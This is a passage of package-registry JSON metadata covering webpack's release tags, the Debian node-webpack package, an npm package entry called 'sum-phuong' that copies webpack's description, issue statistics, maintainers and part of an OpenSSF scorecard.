bpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T22:03:38.475Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/node-webpack?arch=source\u0026distro=debian-11\u0026repository_url=https://packages.debian.org/bullseye","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"debian-11","url":"https://packages.debian.org/bullseye","ecosystem":"debian","default":false,"packages_count":31268,"maintainers_count":0,"namespaces_count":3,"keywords_count":759,"github":"debian","metadata":{"codename":"bullseye","funded_packages_count":874},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.702Z","updated_at":"2026-09-02T05:06:05.475Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-11/namespaces"}},{"id":10413052,"name":"sum-phuong","ecosystem":"npm","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2024-06-20T15:49:38.346Z","latest_release_published_at":"2024-06-26T14:56:33.604Z","latest_release_number":"5.92.1","last_synced_at":"2026-09-03T00:32:37.456Z","created_at":"2024-06-21T01:00:22.854Z","updated_at":"2026-09-03T00:32:37.456Z","registry_url":"https://www.npmjs.com/package/sum-phuong","install_command":"npm install sum-phuong","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.92.1"}},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 